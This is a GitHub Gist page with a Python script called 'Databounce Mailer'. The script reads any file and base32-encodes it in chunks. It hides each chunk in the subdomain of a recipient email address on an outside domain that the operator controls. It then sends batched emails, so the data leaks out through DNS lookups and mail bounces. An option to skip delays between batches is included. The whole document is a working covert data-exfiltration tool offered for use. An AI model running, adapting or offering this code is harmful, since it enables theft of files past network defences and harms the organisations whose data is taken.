Created
November 14, 2024 14:27
-
-
Save yosignals/dce98eea85f8032afa0106e6ad6ad95e to your computer and use it in GitHub Desktop.
Databounce Mailer - 500 'recipients per email'
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import base64 | |
import smtplib | |
import time | |
import argparse | |
import dns.resolver | |
from email.mime.text import MIMEText | |
from email.mime.multipart import MIMEMultipart | |
# Configuration | |
CHUNK_SIZE = 63 # Size of each data chunk in bytes | |
RECIPIENTS_PER_EMAIL = 500 | |
FREQUENCY_DELAY = 10 # Default delay in seconds between sending batches | |
SMTP_PORT = 587 # Change to 465 if using SSL | |
SMTP_USER = '[email protected]' | |
SMTP_PASSWORD = 'your_password' | |
USE_SSL = False # Set to True if your server uses SSL on port 465 | |
def encode_file_in_base32_chunks(filepath): | |
with open(filepath, 'rb') as file: | |
data = file.read() | |
chunks = [data[i:i+CHUNK_SIZE] for i in range(0, len(data), CHUNK_SIZE)] | |
# Base32 encode each chunk, remove padding, and limit to 40 characters | |
encoded_chunks = [base64.b32encode(chunk).decode('utf-8').rstrip('=')[:40] for chunk in chunks] | |
return encoded_chunks | |
def format_email_address(chunk_number, total_chunks, encoded_chunk, external_domain): | |
# Construct the subdomain, limit each section to keep within 63-character label limit | |
full_subdomain = f"{chunk_number}of{total_chunks}.{encoded_chunk}.{external_domain}" | |
# Check if each DNS label is <= 63 characters and full domain <= 253 characters | |
labels = full_subdomain.split('.') | |
if any(len(label) > 63 for label in labels) or len(full_subdomain) > 253: | |
raise ValueError(f"DNS label or domain too long: {full_subdomain}") | |
return f"boop@{full_subdomain}" | |
def prepare_recipients(encoded_chunks, external_domain): | |
total_chunks = len(encoded_chunks) | |
recipients = [ | |
format_email_address(i+1, total_chunks, encoded_chunk, external_domain) | |
for i, encoded_chunk in enumerate(encoded_chunks) | |
] | |
return recipients | |
def resolve_full_subdomain(full_subdomain): | |
""" | |
Attempts to resolve a full subdomain (multi-level) and returns True if successful. | |
""" | |
try: | |
resolver = dns.resolver.Resolver(configure=False) | |
resolver.cache = None # Disable caching to ensure fresh resolution | |
resolver.nameservers = ['8.8.8.8', '8.8.4.4'] # Use Google's public DNS servers | |
# Perform an A record lookup for the full subdomain | |
resolver.resolve(full_subdomain, 'A') | |
print(f"Subdomain {full_subdomain} resolved successfully.") | |
return True | |
except dns.resolver.NXDOMAIN: | |
print(f"Subdomain {full_subdomain} does not exist.") | |
return False | |
except dns.resolver.NoAnswer: | |
print(f"No answer for subdomain {full_subdomain}.") | |
return False | |
except Exception as e: | |
print(f"Failed to resolve {full_subdomain}: {e}") | |
return False | |
def send_emails_in_batches(recipients, smtp_server, aggressive, delay): | |
total_recipients = len(recipients) | |
total_batches = (total_recipients + RECIPIENTS_PER_EMAIL - 1) // RECIPIENTS_PER_EMAIL # Ceiling division | |
smtp_class = smtplib.SMTP_SSL if USE_SSL else smtplib.SMTP | |
with smtp_class(smtp_server, SMTP_PORT) as server: | |
if not USE_SSL and SMTP_PORT == 587: | |
server.starttls() # Use TLS only if not SSL and port 587 | |
# If authentication is not required, comment out the login line | |
# server.login(SMTP_USER, SMTP_PASSWORD) | |
for batch_num in range(total_batches): | |
batch_recipients = [] | |
for recipient in recipients[batch_num * RECIPIENTS_PER_EMAIL : (batch_num + 1) * RECIPIENTS_PER_EMAIL]: | |
full_subdomain = recipient.split('@')[1] | |
if resolve_full_subdomain(full_subdomain): # Only add if the full subdomain resolves | |
batch_recipients.append(recipient) | |
if batch_recipients: | |
msg = MIMEMultipart() | |
msg['From'] = SMTP_USER | |
msg['Subject'] = "Data Transmission" | |
for recipient in batch_recipients: | |
msg['To'] = recipient | |
msg.attach(MIMEText("Placeholder text - actual data attached in email address")) | |
server.sendmail(SMTP_USER, batch_recipients, msg.as_string()) | |
print(f"Batch {batch_num + 1}/{total_batches} sent to {len(batch_recipients)} recipients.") | |
if not aggressive: | |
time.sleep(delay) # Delay between batches | |
def send_encoded_file(filepath, external_domain, aggressive=False, delay=FREQUENCY_DELAY): | |
smtp_server = f"smtp.{external_domain.split('.', 1)[1]}" # Use the domain part after the first subdomain | |
encoded_chunks = encode_file_in_base32_chunks(filepath) | |
recipients = prepare_recipients(encoded_chunks, external_domain) | |
print(f"Prepared {len(recipients)} recipient addresses.") | |
send_emails_in_batches(recipients, smtp_server, aggressive=aggressive, delay=delay) | |
if __name__ == '__main__': | |
parser = argparse.ArgumentParser(description="Send a file as encoded data chunks via email.") | |
parser.add_argument('filepath', type=str, help="Path to the file to be sent.") | |
parser.add_argument('external_domain', type=str, help="External domain to use in the recipient email addresses.") | |
parser.add_argument('--aggressive', action='store_true', help="Send emails without delay between batches.") | |
parser.add_argument('--delay', type=int, default=FREQUENCY_DELAY, help="Delay in seconds between email batches.") | |
args = parser.parse_args() | |
send_encoded_file(args.filepath, args.external_domain, aggressive=args.aggressive, delay=args.delay) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment